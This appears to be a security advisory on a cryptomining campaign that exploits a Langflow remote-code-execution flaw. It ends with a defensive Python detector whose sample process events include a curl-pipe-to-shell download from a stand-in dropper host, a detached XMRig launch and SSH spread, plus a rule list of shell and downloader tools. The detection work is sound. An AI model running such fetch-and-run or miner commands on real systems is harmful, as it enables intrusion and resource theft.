June 30, 2026
Fool's guide to illicit crypto miners via Langflow RCE exploit
Threat:

By KN
Langflow is currently being exploited through a critical vulnerability that allows unauthenticated remote code execution (CVE-2026-33017, CVSS 9.3). The main threat from these attacks is the installation and activation of cryptocurrency miners on compromised systems.
What is the impact:
Organisations with exposed Langflow endpoints are at risk of illicit cryptocurrency miners running on their systems, which in turn causes resource degradation and potential lateral movement through the wider system via SSH keys. The malware aims to disable security controls while also ensuring persistence; one of the key security controls it aims to disable is system logs. Because of this, detection of, and in turn recovery from, this attack can be particularly difficult.
What is Langflow:
Langflow is an open-source framework that is designed to aid developers in building and deploying AI-powered workflows that use large-language-model (LLM) components.
How the attack works:
Hackers are scanning for and targeting exposed application endpoints, exploiting the RCE flaw to execute a Python script. This script downloads a shell script dropper, which then fetches and deploys an XMRig miner, disables host security features, and spreads to other SSH-reachable hosts.
"In this campaign, a single line of Python code evaluated inside an unauthenticated Langflow API endpoint pulls down a shell script, fetches a miner binary, and launches it detached,"
The above is a statement made by Trend Micro researchers, and can be found in the following technical report: From Langflow to Monero: Inside CVE-2026-33017 Cryptominer | Trend Micro (US)
Mitigation:
Defenders must secure and minimize the exposure of Langflow and other AI application endpoints, as these are becoming new entry points for attackers. Implementing robust monitoring for suspicious activity and applying Zero Trust principles and controls are crucial to reduce overall risk and limit lateral movement.
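One way to approach the monitoring described above, as an added example that is not from the original post or the Trend Micro report: it walks process-creation events and flags shells, downloaders, detached launchers, SSH clients and the XMRig name when they descend from a Langflow process. The event format, sample events, host names and rule names are constructed assumptions.

```python
import os
import re

# Constructed process-creation events (pid, ppid, command line); not real telemetry.
SAMPLE_EVENTS = [
    (100, 1, "/usr/bin/python3 -m langflow run"),
    (101, 100, "/usr/bin/python3 -m langflow run"),  # forked worker
    (200, 101, 'sh -c "curl -s http://dropper.example.invalid/a.sh | sh"'),
    (201, 200, "curl -s http://dropper.example.invalid/a.sh"),
    (202, 200, "sh"),
    (203, 202, "nohup ./xmrig"),
    (204, 202, "ssh root@10.0.0.5"),
    (300, 1, 'sh -c "curl -s https://pkg.example.invalid/update"'),  # no Langflow ancestor
]

# Hypothetical rule names mapped to binary basenames worth flagging under Langflow.
RULES = {
    "shell": {"sh", "bash", "dash"},
    "downloader": {"curl", "wget"},
    "detached-launch": {"nohup", "setsid"},
    "ssh-client": {"ssh", "scp"},
    "miner-name": {"xmrig"},
}

def classify(cmdline):
    """Return sorted rule tags for any token whose basename matches a rule."""
    tokens = re.split(r"[\s|;&\"']+", cmdline)
    names = {os.path.basename(t).lower() for t in tokens}
    return sorted(tag for tag, binaries in RULES.items() if names & binaries)

def find_suspicious(events):
    """Flag processes matching a rule that have a Langflow process as an ancestor."""
    parent = {pid: ppid for pid, ppid, _ in events}
    cmd = {pid: c for pid, _, c in events}
    findings = []
    for pid, ppid, cmdline in events:
        anc, seen = ppid, set()
        while anc in cmd and anc not in seen:  # walk up the process tree
            if "langflow" in cmd[anc].lower():
                tags = classify(cmdline)
                if tags:
                    findings.append((pid, anc, tags))
                break
            seen.add(anc)
            anc = parent[anc]
    return findings

if __name__ == "__main__":
    for pid, langflow_pid, tags in find_suspicious(SAMPLE_EVENTS):
        print(f"pid {pid} under langflow pid {langflow_pid}: {', '.join(tags)}")
```

Basename matching is a triage heuristic: it will also flag legitimate helper processes a flow starts on purpose, so treat hits as leads to review against what the deployment is expected to run.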